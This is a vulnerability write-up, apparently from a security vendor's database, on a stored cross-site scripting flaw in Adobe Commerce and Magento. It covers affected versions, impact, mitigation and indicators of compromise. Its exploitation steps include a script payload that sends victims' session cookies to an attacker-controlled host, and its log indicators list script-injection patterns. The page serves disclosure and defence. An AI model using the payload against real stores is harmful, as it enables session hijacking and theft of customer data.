CVE-2026-21290
Adobe Commerce vulnerability analysis and mitigation

Overview

CVE-2026-21290 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce and Magento Open Source that allows a low-privileged attacker to inject malicious scripts into vulnerable form fields. When a victim browses to a page containing the injected content, the malicious JavaScript executes in their browser, enabling session takeover. Affected versions include Adobe Commerce and Magento Open Source 2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15, 2.4.4-p16, and all earlier versions; Adobe Commerce B2B is also affected across multiple versions. The vulnerability was disclosed on March 10–11, 2026, with a patch released simultaneously. It carries a CVSS v3.1 base score of 8.7 (High) (Adobe Advisory).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically of the stored (persistent) variant. A low-privileged authenticated attacker can submit a crafted payload into a vulnerable form field within the Adobe Commerce admin or storefront interface; the application fails to properly sanitize or encode the input before storing and subsequently rendering it. When any user — including administrators — visits the page containing the malicious field, the injected JavaScript executes in their browser context with the scope changed (S:C), meaning the script can affect resources beyond the originating page. Exploitation requires user interaction (a victim must navigate to the affected page) but does not require elevated privileges beyond a basic authenticated account (Adobe Advisory).

Impact

Successful exploitation allows an attacker to hijack authenticated sessions (including administrator sessions), steal credentials, exfiltrate sensitive data, and modify page content visible to victims — resulting in high confidentiality and high integrity impact with no availability impact. In e-commerce environments, session takeover of an administrator account could enable an attacker to escalate privileges, modify product listings, access customer payment data, or install backdoors. The broad scope of affected versions across Adobe Commerce, Magento Open Source, and Commerce B2B significantly widens the potential attack surface (Adobe Advisory).

Exploitation steps

  1. Reconnaissance: Identify Adobe Commerce or Magento Open Source instances running affected versions (2.4.4-p16 and earlier, 2.4.5-p15 and earlier, 2.4.6-p13 and earlier, 2.4.7-p8 and earlier, 2.4.8-p3 and earlier, or 2.4.9-alpha3) using tools like Shodan, Censys, or version fingerprinting via HTTP response headers and page metadata.
  2. Obtain low-privileged access: Register or use an existing low-privileged account on the target Adobe Commerce instance (e.g., a customer account or restricted admin account).
  3. Identify vulnerable form fields: Navigate through the application to locate form fields that store and later render user-supplied input without proper sanitization — such as product reviews, customer profile fields, or admin-accessible input areas.
  4. Inject XSS payload: Submit a crafted stored XSS payload into the vulnerable field, for example: <script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an equivalent obfuscated variant to bypass basic filters.
  5. Wait for victim interaction: The payload is stored server-side. When a victim (e.g., an administrator reviewing submissions) browses to the page containing the injected field, the malicious JavaScript executes in their browser.
  6. Achieve session takeover: The script exfiltrates the victim's session cookie or authentication token to an attacker-controlled server, allowing the attacker to impersonate the victim and perform unauthorized actions (Adobe Advisory).

Indicators of compromise

  • Network: Outbound HTTP/HTTPS requests from victim browsers to unexpected external domains shortly after visiting Commerce admin or storefront pages; unusual POST requests to form endpoints containing script tags or encoded JavaScript payloads.
  • Logs: Adobe Commerce access logs showing form submissions containing <script>, javascript:, onerror=, onload=, or Base64-encoded script content in input fields; admin activity logs showing actions performed from unfamiliar IP addresses or at unusual times following a page visit.
  • File System: Unexpected modifications to stored content in the database (e.g., product descriptions, customer fields, CMS blocks) containing embedded JavaScript or HTML event handlers.
  • Browser/Session: Multiple admin sessions active simultaneously from geographically disparate IP addresses; session tokens appearing in external server logs or analytics platforms not controlled by the organization.

Mitigation and workarounds

Adobe has released patched versions addressing this vulnerability as documented in security bulletin APSB26-05. Users should upgrade to versions beyond the affected releases: Adobe Commerce 2.4.4-p16, 2.4.5-p15, 2.4.6-p13, 2.4.7-p8, 2.4.8-p3, and 2.4.9-alpha3 (apply the latest available patch for your branch). Additional hardening measures include implementing Content Security Policy (CSP) headers to restrict unauthorized script execution, enforcing server-side input validation and output encoding for all user-supplied data, and deploying a Web Application Firewall (WAF) with rules to detect and block XSS payloads (Adobe Advisory).

Community reactions

The vulnerability was covered as part of Adobe's broader March 2026 patch release, which addressed approximately 80 vulnerabilities across eight products, drawing attention from security news outlets and threat intelligence aggregators. CIS published an advisory noting that multiple Adobe product vulnerabilities could allow for arbitrary code execution in the broader patch batch. Community coverage on platforms such as Mastodon and Bluesky highlighted the stored XSS risk in e-commerce environments. No significant controversy or researcher-specific commentary specific to CVE-2026-21290 has been identified beyond standard patch-Tuesday reporting (CIS Advisory, The Hacker Wire).

Additional resources


SourceThis report was generated using AI

Related Adobe Commerce vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-48358CRITICAL10
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48356CRITICAL9.6
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48000MEDIUM6.1
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48371MEDIUM5.4
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026
CVE-2026-48001LOW3.7
  • Adobe Commerce logoAdobe Commerce
  • cpe:2.3:a:adobe:commerce
NoNoJul 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management